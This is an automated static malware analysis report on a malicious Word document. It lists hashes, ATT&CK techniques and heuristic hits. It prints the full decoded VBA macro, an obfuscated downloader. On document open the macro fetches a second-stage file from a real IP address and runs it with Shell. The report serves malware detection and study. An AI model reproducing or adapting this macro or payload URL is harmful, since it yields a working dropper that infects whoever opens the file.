Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5ab2294f5fe312a4…

MALICIOUS

Office (OOXML)

304.1 KB Created: 2019-04-18 08:25:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2020-02-04
MD5: 57f6cbcd5dcb4e6a7e8c1de3927a210c SHA-1: f03542f7a97cafdace0450af32edbea76e1852a6 SHA-256: 5ab2294f5fe312a4c869e9360f974b052882b32aa7157896c3039459abd8e90b
150 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1071.001 Web Protocols T1059 Command and Scripting Interpreter T1105 Ingress Tool Transfer

The sample contains a VBA macro that automatically executes upon opening the document. This macro utilizes the URLDownloadToFileA function to download a file from the URL "http://54.39.233.175/wupd19823.tmp". The presence of the Document_Open macro and the URLDownloadToFileA call strongly indicate a downloader functionality, aiming to retrieve and execute a second-stage payload.

Heuristics 5

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script
        If IsNumeric(45345) = True Then
            Shell erffver
        End If
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    #If VBA7 Then
    Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
            Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
        Iownhrtt
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://54.39.233.175/wupd19823.tmp Referenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://www.iec.chReferenced by macro
    • http://ns.adobe.com/xap/1.0/Referenced by macro
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by macro
    • http://purl.org/dc/elements/1.1/Referenced by macro
    • http://ns.adobe.com/xap/1.0/mm/Referenced by macro
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#Referenced by macro
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#Referenced by macro
    • http://ns.adobe.com/photoshop/1.0/Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2829 bytes
SHA-256: 8cb1d60388a38f3536e8b8f6b1ad634884e0c10a019ce0848e3d35107b87c78d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Iownhrtt
End Sub

Attribute VB_Name = "Mod1"

#If VBA7 Then
Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
        Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
                                    ByVal szURL As String, ByVal szFileName As String, _
                                    ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#Else
Declare Function URLDownloadToFile Lib "urlmon" _
        Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
                                    ByVal szURL As String, ByVal szFileName As String, _
                                    ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#End If
Sub Iownhrtt()
    tavvt = Array("yytt", "ewrwerwr", "krterggr")
    If IsNumeric(tavvt) = False Then
        If 543 > 344 Then
            Nujneett
        End If
    End If
End Sub


Attribute VB_Name = "PoijehFiuier"
Attribute VB_Base = "0{4B9BAAE7-D1B6-40D3-99C2-6199DD8F7D91}{C7B10BA5-B726-43C6-8588-30792A915A4D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Mnedjje1_Change()

End Sub

Private Sub UserForm_Initialize()
    Joime
End Sub
Function Joime()
    
    
    If IsArray(Array(1, 2, 3, 4, 5)) = True Then
        Fuinr566 t1, t2, 874, "ygfh534fghhg"
    End If
End Function
Function Fuinr566(ejnnrj111, ikwerwjjf22, ruwherweru333, hergdfgd444)
    If IsArray(ruwherweru333) = False Then
        Njiojwqehqw ejnnrj111, ikwerwjjf22, ruwherweru333
    End If

    Knwj = Len(hergdfgd444)
    If Knwj = 12 Then
        Gneriwer ejnnrj111
    End If
End Function




Attribute VB_Name = "Mod2"
Function Nujneett()
    If IsNumeric(875) = True Then
        Omnfjnwer
    End If
End Function



Attribute VB_Name = "Mod3"
Sub Njiojwqehqw(mnwuiubh22, miiwthb33, uiwherur44)
    If mnwuiubh22 <> miiwthb33 Then
        If IsNumeric(uiwherur44) = True Then
            URLDownloadToFile 0, miiwthb33, mnwuiubh22, 0, 0
        End If
    End If
End Sub


Sub Gneriwer(erffver)
    If IsNumeric(45345) = True Then
        Shell erffver
    End If
End Sub


Attribute VB_Name = "Mod4"
Function Omnfjnwer()
    PoijehFiuier.Show
End Function



Function t1()
    t1 = PoijehFiuier.Label1.Caption
End Function

Function t2()
    t2 = PoijehFiuier.Label2.Caption
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 24576 bytes
SHA-256: d48c61055ae379278df9bb9669ac1fa036bbefb728dc0d94075aaad1481ca5a5